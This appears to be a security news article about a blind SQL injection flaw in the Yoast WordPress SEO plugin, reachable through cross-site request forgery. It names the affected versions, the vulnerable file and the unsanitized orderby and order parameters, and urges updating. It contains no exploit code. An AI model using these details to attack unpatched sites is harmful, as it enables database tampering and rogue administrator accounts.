Blind SQL Injection Vulnerability Discovered in WordPress SEO Plugin by Yoast

A blind SQL injection vulnerability was recently encountered in the popular WordPress SEO plugin by Yoast. Millions of WordPress websites that uses this popular plug-in to optimize their search engine results are at risk of being hacked.

The WordPress SEO plug-in developed by Dutch website optimization firm Yoast has the vulnerability that allows attackers to manipulate a site’s database and add rogue administrative accounts.This vulnerability was discovered by Ryan Dewhurst a security researcher and co-developer of the WPScan vulnerability scanner. It affects versions 1.7.3.3 and older of WordPress SEO by Yoast.

The flaw requires authentication to exploits. As there is no cross-site request forgery (CSRF) protection, which means any attacker could exploit the flaw by tricking an authenticated user like an administrator, editor or author so as to click on a specially crafted link or to visit a malicious page.

In the CSRF attack when that user visits a Web page controlled by an attacker, users are forced down to execute an unauthorized action on a third-party website. So websites must implement special protection mechanisms to prevent such attacks.

This authenticated vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The order by and order GET parameters are not sufficiently sanitized before being used within a SQL query.

Immediate Update Advised

Users running the most recent version are recommended to update immediately. If you’re using Jetpack on all your sites, then to update it quickly visit to the following link: https://wordpress.com/plugins/wordpress-seo. Here you will see all the sites where you have the plugin installed and can be updated from your centralized dashboard.

Hosting companies are scrambling to add a fix to protect customers. The status blog sent out an advisory on the vulnerability and is immediately updating installations where the plugin is active:”Our systems have already begun updating this plugin across all impacted sites on our systems, and we expect this process to be completed shortly”.

The company has added new security rules to its WAF (web application firewall), which will actively filter any possible incoming hacking attempts that will exploit the vulnerability.